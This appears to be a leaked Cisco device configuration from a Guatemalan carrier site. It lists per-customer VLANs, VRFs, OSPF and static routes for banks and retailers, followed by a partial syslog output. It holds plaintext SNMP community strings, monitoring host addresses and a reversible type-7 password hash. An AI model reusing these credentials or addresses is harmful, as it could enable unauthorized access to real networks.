 SWITCHPORT TRUNK ALLOWED VLAN ADD 2358,2378,2510,2536,2697,2715,2760,3737,3838
 SWITCHPORT MODE TRUNK
!
INTERFACE GIGABITETHERNET0/16
 DESCRIPTION ENLACE HACIA VILLA (RESPALDO)
 PORT-TYPE NNI
 SWITCHPORT TRUNK ALLOWED VLAN 119,1752
 SWITCHPORT MODE TRUNK
!
INTERFACE VLAN1
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE VLAN10
 DESCRIPTION APN_FENOSA_V2
 IP VRF FORWARDING APNFENOSA_V2
 IP ADDRESS 172.20.32.246 255.255.255.252
!
INTERFACE VLAN119
 DESCRIPTION WAN PRINCIPAL/_/399300009T/_/
 IP VRF FORWARDING GESTION_UFINET
 IP ADDRESS 10.174.34.186 255.255.255.252 SECONDARY
 IP ADDRESS 10.87.54.198 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN184
 DESCRIPTION DATOS_BANRURAL_TO_TIV
 IP VRF FORWARDING BANRURAL
 IP ADDRESS 10.16.189.39 255.255.255.128
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 184 AREA 164
 LOAD-INTERVAL 30
!
INTERFACE VLAN189
 IP ADDRESS 10.31.227.2 255.255.255.224
 NO IP REDIRECTS
 NO IP PROXY-ARP
!
INTERFACE VLAN314
 DESCRIPTION DATOS_BANTRAB2_TO_TIV
 IP VRF FORWARDING DATOS_BANTRAB2
 IP ADDRESS 10.18.19.252 255.255.255.240
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 314 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN378
 DESCRIPTION ENVASES_UNIVERSALES_PANAMA
 IP VRF FORWARDING ENVASES_GT_PANAMA
 IP ADDRESS 10.78.163.228 255.255.255.248
!
INTERFACE VLAN568
 DESCRIPTION INTERNET_UFINET_TO_TIV
 IP VRF FORWARDING INTERNETS_UFINET
 IP ADDRESS 10.87.181.16 255.255.255.224
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
!
INTERFACE VLAN1462
 DESCRIPTION ALIMENTOS IDEAL, S.A. ID 53600048
 NO IP ADDRESS
!
INTERFACE VLAN1585
 DESCRIPTION BI PANAMA ID7900159_UFINET_ID_GTPA00070202
 IP VRF FORWARDING BI_PANAMA
 IP ADDRESS 10.78.170.76 255.255.255.248
!
INTERFACE VLAN1752
 DESCRIPTION ID399300004 GAS NATURAL FENOSA APN
 IP VRF FORWARDING APNFENOSA
 IP ADDRESS 10.78.223.148 255.255.255.248 SECONDARY
 IP ADDRESS 10.78.208.206 255.255.255.252
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF 1 AREA 339
!
INTERFACE VLAN1795
 DESCRIPTION DATOS_WALMART_TO_TIV
 IP VRF FORWARDING DATOS_WALMART
 IP ADDRESS 10.31.139.101 255.255.255.248
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 1795 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2218
 DESCRIPTION PBX_ACCESOS_TO_TIV
 IP VRF FORWARDING IP_PBX_ACCESOS
 IP ADDRESS 10.174.158.170 255.255.255.252
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF DEAD-INTERVAL 30
 IP OSPF MTU-IGNORE
 IP OSPF 2218 AREA 5
 LOAD-INTERVAL 30
!
INTERFACE VLAN2358
 DESCRIPTION DATOS_INNOVA_TO_TIV
 IP VRF FORWARDING DATOS_INNOVA
 IP ADDRESS 10.31.127.132 255.255.255.248
 IP OSPF NETWORK POINT-TO-MULTIPOINT
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 2358 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2378
 DESCRIPTION APN FENOSA
 IP VRF FORWARDING APNFENOSA_V2
 IP ADDRESS 10.87.249.180 255.255.255.248
!
INTERFACE VLAN2500
 DESCRIPTION ID_CLARO_GT_7900169T_LAN_BI_INTERNACIONALES_UFINET_ID_GT00070163
 IP VRF FORWARDING BI_INTERNACIONALES
 IP ADDRESS 192.168.60.1 255.255.255.0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2501
 DESCRIPTION ID_CLARO_GT_440400005_ENVASES_GT_PANAMA_UFINET_ID_GTPA00070162
 IP VRF FORWARDING ENVASES_GT_PANAMA
 IP ADDRESS 192.20.21.1 255.255.255.0
!
INTERFACE VLAN2502
 DESCRIPTION ID_CLARO_GT_7900159T_LAN_BI_PANAMA_UFINET_ID_GT00070202
 IP VRF FORWARDING BI_PANAMA
 IP ADDRESS 10.203.1.186 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2503
 DESCRIPTION LAN_DALIMENTOSIDEAL
 NO IP ADDRESS
 LOAD-INTERVAL 30
!
INTERFACE VLAN2504
 DESCRIPTION LAN_APNFENOSA
 IP VRF FORWARDING APNFENOSA
 IP ADDRESS 198.198.198.23 255.255.255.0
!
INTERFACE VLAN2510
 DESCRIPTION DATOS_INNOVA_863400336T
 BANDWIDTH 10240
 IP VRF FORWARDING DATOS_INNOVA
 IP ADDRESS 10.174.185.193 255.255.255.252
 RATE-LIMIT INPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
!
INTERFACE VLAN2513
 DESCRIPTION DATOS_INNOVA_863400087T
 IP VRF FORWARDING DATOS_INNOVA
 IP ADDRESS 10.174.199.141 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2514
 DESCRIPTION DATOS_RENAP_817100051T
 NO IP ADDRESS
 LOAD-INTERVAL 30
!
INTERFACE VLAN2515
 DESCRIPTION DATOS_INNOVA_863400251T
 IP VRF FORWARDING DATOS_INNOVA
 IP ADDRESS 10.174.185.197 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2528
 DESCRIPTION DATOS_INNOVA_863400082T
 IP VRF FORWARDING DATOS_INNOVA
 IP ADDRESS 10.174.185.113 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2535
 DESCRIPTION INTERNET_INTECAP_826900024T
 IP VRF FORWARDING INTERNETS_UFINET
 IP ADDRESS 10.78.151.161 255.255.255.252
!
INTERFACE VLAN2536
 DESCRIPTION DATOS_INTECAP_826900066T
 BANDWIDTH 5120
 IP VRF FORWARDING INTECAP_DATOS
 IP ADDRESS 10.78.151.165 255.255.255.252
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 2536 AREA 0.0.1.186
 LOAD-INTERVAL 30
!
INTERFACE VLAN2537
 DESCRIPTION 344400162
 IP VRF FORWARDING DATOS_WALMART
 IP ADDRESS 10.174.185.213 255.255.255.252
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 1795 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2538
 DESCRIPTION DATOS_WALMART_344400123T
 IP VRF FORWARDING DATOS_WALMART
 IP ADDRESS 10.174.185.201 255.255.255.252
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 1795 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2539
 DESCRIPTION DATOS_WALMART_344400259T
 IP VRF FORWARDING DATOS_WALMART
 IP ADDRESS 10.174.185.209 255.255.255.252
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 1795 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2540
 DESCRIPTION 344400162
 IP VRF FORWARDING DATOS_WALMART
 IP ADDRESS 10.174.185.221 255.255.255.252
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 2540 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2541
 DESCRIPTION 344400234T
 IP VRF FORWARDING DATOS_WALMART
 IP ADDRESS 10.174.185.217 255.255.255.252
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 2541 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2542
 DESCRIPTION DATOS_WALMART_344400186T
 IP VRF FORWARDING DATOS_WALMART
 IP ADDRESS 10.174.185.205 255.255.255.252
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 1795 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2543
 DESCRIPTION AE_TIK_834900001T
 IP VRF FORWARDING IP_PBX_ACCESOS
 IP ADDRESS 10.174.158.173 255.255.255.252
 IP OSPF 2218 AREA 5
 LOAD-INTERVAL 30
 SHUTDOWN
!
INTERFACE VLAN2545
 DESCRIPTION DATOS_MP_758500189T
 IP VRF FORWARDING MP_TELEF
 IP ADDRESS 10.174.185.157 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2546
 DESCRIPTION INTERNET_FINCA GUATEMALA_284500074T
 IP VRF FORWARDING INTERNETS_UFINET
 IP ADDRESS 10.174.199.137 255.255.255.252
!
INTERFACE VLAN2547
 DESCRIPTION INTERNET_BANRURAL_8902642T
 IP VRF FORWARDING INTERNETS_UFINET
 IP ADDRESS 10.174.185.141 255.255.255.252
!
INTERFACE VLAN2548
 DESCRIPTION INTERNET_BANRURAL_832000061T
 IP VRF FORWARDING INTERNETS_UFINET
 IP ADDRESS 10.174.199.129 255.255.255.252
!
INTERFACE VLAN2549
 DESCRIPTION DATOS_BANRURAL_8900852T
 IP VRF FORWARDING BANRURAL
 IP ADDRESS 10.174.199.133 255.255.255.252
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 2549 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2550
 DESCRIPTION DATOS_MP_758500188T
 IP VRF FORWARDING MP_TELEF
 IP ADDRESS 10.174.185.137 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2551
 DESCRIPTION DATOS_MP_758500135T
 IP VRF FORWARDING MP_TELEF
 IP ADDRESS 10.174.185.133 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2552
 DESCRIPTION DATOS_MP_758500168
 IP VRF FORWARDING MP_TELEF
 IP ADDRESS 10.174.185.97 255.255.255.252
!
INTERFACE VLAN2553
 DESCRIPTION DATOS_MP_758500211T
 IP VRF FORWARDING MP_TELEF
 IP ADDRESS 10.174.185.129 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2555
 DESCRIPTION DATOS_BANTRAB2_42700305T
 IP VRF FORWARDING DATOS_BANTRAB2
 IP ADDRESS 10.174.185.117 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2556
 DESCRIPTION DATOS_BANTRAB2_42700331T
 IP VRF FORWARDING DATOS_BANTRAB2
 IP ADDRESS 10.174.199.145 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2557
 DESCRIPTION DATOS_BANTRAB2_42700314T
 IP VRF FORWARDING DATOS_BANTRAB2
 IP ADDRESS 10.174.185.109 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2558
 DESCRIPTION DATOS_BANTRAB2_42700320T
 IP VRF FORWARDING DATOS_BANTRAB2
 IP ADDRESS 10.174.185.105 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2559
 DESCRIPTION DATOS_BANTRAB2_42700337T
 IP VRF FORWARDING DATOS_BANTRAB2
 IP ADDRESS 10.174.185.101 255.255.255.252
 LOAD-INTERVAL 30
!
INTERFACE VLAN2697
 DESCRIPTION DATOS_MP_TO_TIV
 IP VRF FORWARDING MP_TELEF
 IP ADDRESS 10.174.185.2 255.255.255.248
 IP OSPF NETWORK POINT-TO-MULTIPOINT
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 2697 AREA 0
 LOAD-INTERVAL 30
!
INTERFACE VLAN2715
 DESCRIPTION INTECAP_DATOS_TO_TIV
 IP VRF FORWARDING INTECAP_DATOS
 IP ADDRESS 10.174.194.69 255.255.255.240
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF 2715 AREA 442
!
INTERFACE VLAN2760
 DESCRIPTION AVON_GT_PANAMA ID39300027
 IP VRF FORWARDING AVON_PANAMA
 IP ADDRESS 10.87.54.94 255.255.255.252
!
INTERFACE VLAN3838
 DESCRIPTION ID 7900185T BANCO INDUSTRIAL S.A.
 IP VRF FORWARDING BI_INTERNACIONALES
 IP ADDRESS 10.78.218.50 255.255.255.248
 SHUTDOWN
!
ROUTER OSPF 184 VRF BANRURAL
 ROUTER-ID 10.16.189.39
 CAPABILITY VRF-LITE
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE OSPF 2549 VRF BANRURAL SUBNETS
 NETWORK 10.16.189.0 0.0.0.127 AREA 164
 NEIGHBOR 10.16.189.1
!
ROUTER OSPF 314 VRF DATOS_BANTRAB2
 ROUTER-ID 10.18.19.252
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 NETWORK 10.18.19.240 0.0.0.15 AREA 0
 NEIGHBOR 10.18.19.241
!
ROUTER OSPF 1 VRF APNFENOSA
 ROUTER-ID 10.78.208.206
 CAPABILITY VRF-LITE
 AREA 339 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 REDISTRIBUTE STATIC SUBNETS ROUTE-MAP ESTATICAS
 NETWORK 10.78.208.204 0.0.0.3 AREA 339
!
ROUTER OSPF 1795 VRF DATOS_WALMART
 ROUTER-ID 10.31.139.101
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE OSPF 2540 VRF DATOS_WALMART SUBNETS
 REDISTRIBUTE OSPF 2541 VRF DATOS_WALMART SUBNETS
 NETWORK 10.174.185.200 0.0.0.3 AREA 0
 NETWORK 10.174.185.204 0.0.0.3 AREA 0
 NETWORK 10.174.185.208 0.0.0.3 AREA 0
 NETWORK 10.174.185.212 0.0.0.3 AREA 0
 NEIGHBOR 10.174.185.202
 NEIGHBOR 10.174.185.214
 NEIGHBOR 10.31.139.97
 DISTRIBUTE-LIST PREFIX DEFAULT_WALMART_UFINET IN VLAN1795
!
ROUTER OSPF 2218 VRF IP_PBX_ACCESOS
 ROUTER-ID 10.174.158.170
 AREA 5 NSSA
 REDISTRIBUTE CONNECTED SUBNETS
 NETWORK 10.174.158.168 0.0.0.3 AREA 5
!
ROUTER OSPF 2358 VRF DATOS_INNOVA
 ROUTER-ID 10.174.185.197
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 NETWORK 10.31.127.128 0.0.0.7 AREA 0
!
ROUTER OSPF 2536 VRF INTECAP_DATOS
 ROUTER-ID 10.78.151.165
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 2715 VRF INTECAP_DATOS SUBNETS
 NETWORK 10.78.151.164 0.0.0.3 AREA 0.0.1.186
 NEIGHBOR 10.78.151.166
 DEFAULT-INFORMATION ORIGINATE
!
ROUTER OSPF 2540 VRF DATOS_WALMART
 ROUTER-ID 10.174.185.221
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE OSPF 1795 VRF DATOS_WALMART SUBNETS
 NEIGHBOR 10.174.185.222
 DEFAULT-INFORMATION ORIGINATE
!
ROUTER OSPF 2541 VRF DATOS_WALMART
 ROUTER-ID 10.174.185.217
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE OSPF 1795 VRF DATOS_WALMART SUBNETS
 NEIGHBOR 10.174.185.218
 DEFAULT-INFORMATION ORIGINATE
!
ROUTER OSPF 2549 VRF BANRURAL
 REDISTRIBUTE OSPF 184 VRF BANRURAL
 DEFAULT-INFORMATION ORIGINATE
!
ROUTER OSPF 2697 VRF MP_TELEF
 ROUTER-ID 10.174.185.2
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 NETWORK 10.174.185.0 0.0.0.7 AREA 0
 DEFAULT-INFORMATION ORIGINATE
!
ROUTER OSPF 2715 VRF INTECAP_DATOS
 ROUTER-ID 10.174.194.69
 AREA 442 NSSA
 REDISTRIBUTE OSPF 2536 VRF INTECAP_DATOS SUBNETS
 NETWORK 10.174.194.64 0.0.0.15 AREA 442
 NEIGHBOR 10.174.194.65
 DEFAULT-INFORMATION ORIGINATE
!
ROUTER OSPF 568 VRF INTERNETS_UFINET
 ROUTER-ID 10.87.181.16
 AREA 341 NSSA
 REDISTRIBUTE STATIC SUBNETS ROUTE-MAP PUBLICAS_MON
 NETWORK 10.87.181.0 0.0.0.31 AREA 341
 NEIGHBOR 10.87.181.1
!
IP DEFAULT-GATEWAY 10.31.227.1
NO IP HTTP SERVER
IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.31.227.1
IP ROUTE 10.255.24.144 255.255.255.248 10.87.54.197 NAME MONITOREO_CLARO
IP ROUTE 190.148.15.192 255.255.255.240 10.87.54.197 NAME MONITOREO_CLARO
IP ROUTE VRF APNFENOSA 0.0.0.0 0.0.0.0 10.78.223.145 220
IP ROUTE VRF APNFENOSA 10.120.45.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA 10.120.125.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA 10.140.151.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA 10.240.64.0 255.255.248.0 198.198.198.3
IP ROUTE VRF APNFENOSA 10.240.74.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA 10.240.76.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA 10.240.94.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA 10.240.113.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA 10.240.194.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA 172.31.0.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA 192.9.200.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA 192.168.200.0 255.255.255.0 198.198.198.3
IP ROUTE VRF APNFENOSA_V2 0.0.0.0 0.0.0.0 172.20.32.245 NAME HACIA_ROUTER_CLIENTE
IP ROUTE VRF APNFENOSA_V2 172.19.8.37 255.255.255.255 10.87.249.177 NAME HACIA_ESCUINTLA
IP ROUTE VRF APNFENOSA_V2 172.19.8.38 255.255.255.255 172.20.32.245 NAME HACIA_ROUTER_CLIENTE
IP ROUTE VRF APNFENOSA_V2 172.19.8.39 255.255.255.255 10.87.249.177
IP ROUTE VRF APNFENOSA_V2 172.20.32.240 255.255.255.252 10.87.249.177 NAME HACIA_ESCUINTLA
IP ROUTE VRF APNFENOSA_V2 172.20.32.252 255.255.255.252 10.87.249.177 NAME SANTA_ROSA
IP ROUTE VRF AVON_PANAMA 0.0.0.0 0.0.0.0 10.87.54.93
IP ROUTE VRF BI_PANAMA 0.0.0.0 0.0.0.0 10.78.170.73
IP ROUTE VRF BI_PANAMA 10.203.1.176 255.255.255.252 10.78.170.73
IP ROUTE VRF BI_PANAMA 10.203.1.181 255.255.255.255 10.78.170.73
IP ROUTE VRF BI_PANAMA 10.203.1.182 255.255.255.255 10.203.1.185
IP ROUTE VRF DATOS_BANTRAB2 10.212.99.210 255.255.255.255 10.174.185.102 NAME 42700337T
IP ROUTE VRF DATOS_BANTRAB2 10.212.99.240 255.255.255.255 10.174.185.110 NAME 42700314T
IP ROUTE VRF DATOS_BANTRAB2 10.212.121.167 255.255.255.255 10.174.185.106 NAME MON_42700320T
IP ROUTE VRF DATOS_BANTRAB2 10.212.125.105 255.255.255.255 10.174.185.118 NAME 42700305T
IP ROUTE VRF DATOS_BANTRAB2 172.28.0.232 255.255.255.252 10.174.185.102 NAME 42700337T
IP ROUTE VRF DATOS_BANTRAB2 172.28.1.12 255.255.255.252 10.174.185.118 NAME 42700305T
IP ROUTE VRF DATOS_BANTRAB2 172.28.1.44 255.255.255.252 10.174.199.146 NAME 42700331T
IP ROUTE VRF DATOS_BANTRAB2 172.28.1.84 255.255.255.252 10.174.185.110 NAME 42700314T
IP ROUTE VRF DATOS_BANTRAB2 172.28.1.116 255.255.255.252 10.174.185.106 NAME 42700320T
IP ROUTE VRF DATOS_INNOVA 172.16.128.0 255.255.255.0 10.174.199.142 NAME 863400087T
IP ROUTE VRF DATOS_INNOVA 172.17.87.0 255.255.255.0 10.174.185.198 NAME 863400251T
IP ROUTE VRF DATOS_INNOVA 192.168.241.12 255.255.255.252 10.174.185.194 NAME 863400336T
IP ROUTE VRF DATOS_INNOVA 192.168.242.8 255.255.255.252 10.174.185.114 NAME 863400082T
IP ROUTE VRF ENVASES_GT_PANAMA 0.0.0.0 0.0.0.0 10.78.163.225
IP ROUTE VRF GESTION_UFINET 0.0.0.0 0.0.0.0 10.87.54.197 NAME DEFAULT
IP ROUTE VRF GESTION_UFINET 10.212.129.143 255.255.255.255 10.87.54.197
IP ROUTE VRF INTECAP_DATOS 0.0.0.0 0.0.0.0 10.174.194.65
IP ROUTE VRF INTERNETS_UFINET 0.0.0.0 0.0.0.0 10.87.181.1 220 NAME DEFAUL_INTERNET_UFINET
IP ROUTE VRF INTERNETS_UFINET 10.212.176.20 255.255.255.255 VLAN2547 10.174.185.142 NAME BANRURAL_8902642T_MON
IP ROUTE VRF INTERNETS_UFINET 10.212.176.37 255.255.255.255 VLAN2548 10.174.199.130 NAME MON_832000061T
IP ROUTE VRF INTERNETS_UFINET 10.212.178.51 255.255.255.255 VLAN2535 10.78.151.162 NAME INTECAP_826900024_MON
IP ROUTE VRF INTERNETS_UFINET 10.212.185.129 255.255.255.255 VLAN2546 10.174.199.138 NAME INTERNET_FINCA_GUATEMALA_284500074T_MON
IP ROUTE VRF INTERNETS_UFINET 181.209.194.156 255.255.255.252 VLAN2547 10.174.185.142 NAME BANRURAL_8902642T
IP ROUTE VRF INTERNETS_UFINET 181.209.219.104 255.255.255.252 VLAN2548 10.174.199.130 NAME 832000061T
IP ROUTE VRF INTERNETS_UFINET 190.143.158.176 255.255.255.252 VLAN2535 10.78.151.162 NAME INTECAP_826900024T
IP ROUTE VRF INTERNETS_UFINET 200.6.244.208 255.255.255.252 VLAN2546 10.174.199.138 NAME INTERNET_FINCA_GUATEMALA_284500074T
IP ROUTE VRF IP_PBX_ACCESOS 0.0.0.0 0.0.0.0 10.174.158.169 NAME PE
IP ROUTE VRF MP_TELEF 10.212.180.163 255.255.255.255 10.174.185.134 NAME MON_758500135
IP ROUTE VRF MP_TELEF 10.212.181.23 255.255.255.255 10.174.185.158 NAME MON_758500189
IP ROUTE VRF MP_TELEF 10.212.181.100 255.255.255.255 10.174.185.98 NAME MON_910400020T
IP ROUTE VRF MP_TELEF 10.212.182.53 255.255.255.255 10.174.185.130 NAME MON_910400022T
IP ROUTE VRF MP_TELEF 10.212.183.244 255.255.255.255 10.174.185.138 NAME 910400021T_MON
IP ROUTE VRF MP_TELEF 172.17.29.0 255.255.255.0 10.174.185.130 NAME 910400022T
IP ROUTE VRF MP_TELEF 172.17.145.0 255.255.255.0 10.174.185.158 NAME 758500189
IP ROUTE VRF MP_TELEF 172.17.161.0 255.255.255.0 10.174.185.138 NAME 910400021T
IP ROUTE VRF MP_TELEF 172.17.206.0 255.255.255.0 10.174.185.98 NAME 758500168
IP ROUTE VRF MP_TELEF 172.17.235.0 255.255.255.0 10.174.185.134 NAME 758500135
IP ROUTE VRF BI_INTERNACIONALES 0.0.0.0 0.0.0.0 10.78.218.49
IP ROUTE VRF BI_INTERNACIONALES 192.168.70.0 255.255.255.0 10.78.218.49
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 198.198.198.0/24
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.137.32/32
!
IP PREFIX-LIST DEFAULT_WALMART_UFINET SEQ 5 PERMIT 0.0.0.0/0
!
IP PREFIX-LIST ESTATICAS SEQ 5 PERMIT 10.240.194.0/24
IP PREFIX-LIST ESTATICAS SEQ 10 PERMIT 10.240.64.0/21
IP PREFIX-LIST ESTATICAS SEQ 15 PERMIT 10.240.94.0/24
IP PREFIX-LIST ESTATICAS SEQ 20 PERMIT 192.9.200.0/24
IP PREFIX-LIST ESTATICAS SEQ 25 PERMIT 192.168.200.0/24
IP PREFIX-LIST ESTATICAS SEQ 30 PERMIT 10.240.76.0/24
IP PREFIX-LIST ESTATICAS SEQ 35 PERMIT 10.240.74.0/24
IP PREFIX-LIST ESTATICAS SEQ 40 PERMIT 10.120.45.0/24
IP PREFIX-LIST ESTATICAS SEQ 45 PERMIT 10.120.125.0/24
IP PREFIX-LIST ESTATICAS SEQ 50 PERMIT 10.140.151.0/24
IP PREFIX-LIST ESTATICAS SEQ 55 PERMIT 10.212.129.143/32
IP PREFIX-LIST ESTATICAS SEQ 60 PERMIT 190.148.15.192/28
IP PREFIX-LIST ESTATICAS SEQ 65 PERMIT 172.31.0.0/24
!
IP PREFIX-LIST PUBLICAS_MON SEQ 5 PERMIT 190.143.158.176/30
IP PREFIX-LIST PUBLICAS_MON SEQ 10 PERMIT 10.212.178.51/32
IP PREFIX-LIST PUBLICAS_MON SEQ 15 PERMIT 200.6.244.208/30
IP PREFIX-LIST PUBLICAS_MON SEQ 20 PERMIT 10.212.185.129/32
IP PREFIX-LIST PUBLICAS_MON SEQ 25 PERMIT 181.209.219.104/30
IP PREFIX-LIST PUBLICAS_MON SEQ 30 PERMIT 10.212.176.37/32
IP PREFIX-LIST PUBLICAS_MON SEQ 35 PERMIT 181.209.194.156/30
IP PREFIX-LIST PUBLICAS_MON SEQ 40 PERMIT 10.212.176.20/32
!
IP PREFIX-LIST DEFAULT SEQ 5 PERMIT 0.0.0.0/0
IP SLA ENABLE REACTION-ALERTS
LOGGING ESM CONFIG
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ROUTE-MAP PUBLICAS_MON PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST PUBLICAS_MON
!
ROUTE-MAP DEFAULT PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST DEFAULT
!
ROUTE-MAP ESTATICAS PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST ESTATICAS
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNECTED
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER COMMUNITY 1EN3TW0RKZKOM2OI9 RO
SNMP-SERVER TRAP-SOURCE LOOPBACK7
SNMP-SERVER LOCATION AVENIDA REFORMA 6-39 ZONA 10 EDIFICIO GUAYACAN NIVEL 7 OFICINA 701 GUATEMALA
SNMP-SERVER HOST 10.255.26.75 VERSION 2C 1EN3TW0RKZKOM2OI9
SNMP-SERVER HOST 10.255.26.78 VERSION 2C 1EN3TW0RKZKOM2OI9
SNMP-SERVER HOST 10.255.26.81 VERSION 2C 1EN3TW0RKZKOM2OI9
SNMP-SERVER HOST 10.255.26.84 VERSION 2C 1EN3TW0RKZKOM2OI9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VTY 0 4
 LOGIN LOCAL
 LENGTH 0
 TRANSPORT INPUT ALL
 TRANSPORT OUTPUT ALL
LINE VTY 5 15
 PASSWORD 7 120D001B151E0D
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
END
CC_UFINET_GT_Z10_EDIF_GUAYACAN#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 0 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 22226 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 37 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 22226 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    FILE LOGGING: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILT</t>
  </si>
  <si>
